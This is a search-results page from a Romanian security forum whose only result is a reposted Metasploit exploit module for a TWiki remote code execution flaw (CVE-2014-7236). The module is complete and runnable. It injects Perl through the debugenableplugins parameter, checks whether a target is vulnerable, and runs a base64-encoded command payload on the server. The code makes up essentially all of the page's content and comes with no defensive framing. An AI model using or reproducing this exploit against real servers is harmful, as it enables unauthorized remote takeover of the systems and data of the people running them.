Jump to content

Search the Community

Showing results for tags 'twiki'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Fake News Romania
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 1 result

  1. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'TWiki Debugenableplugins Remote Code Execution', 'Description' => %q{ TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality. The value of the debugenableplugins parameter is used without proper sanitization in an Perl eval statement which allows remote code execution }, 'Author' => [ 'Netanel Rubin', # from Check Point - Discovery 'h0ng10', # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2014-7236'], [ 'OSVDB', '112977'], [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236'] ], 'Privileged' => false, 'Targets' => [ [ 'Automatic', { 'Payload' => { 'BadChars' => "", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl python php', } }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 09 2014')) register_options( [ OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]), OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin']) ], self.class) end def send_code(perl_code) uri = target_uri.path data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit" res = send_request_cgi!({ 'method' => 'POST', 'uri' => uri, 'data' => data }) return res end def check rand_1 = rand_text_alpha(5) rand_2 = rand_text_alpha(5) code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")" res = send_code(code) if res and res.code == 200 return CheckCode::Vulnerable if res.body == rand_1 + rand_2 end CheckCode::Unknown end def exploit code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");" code += "require('MIME/Base64.pm');MIME::Base64->import();" code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit" res = send_code(code) handler end end Source
×
×
  • Create New...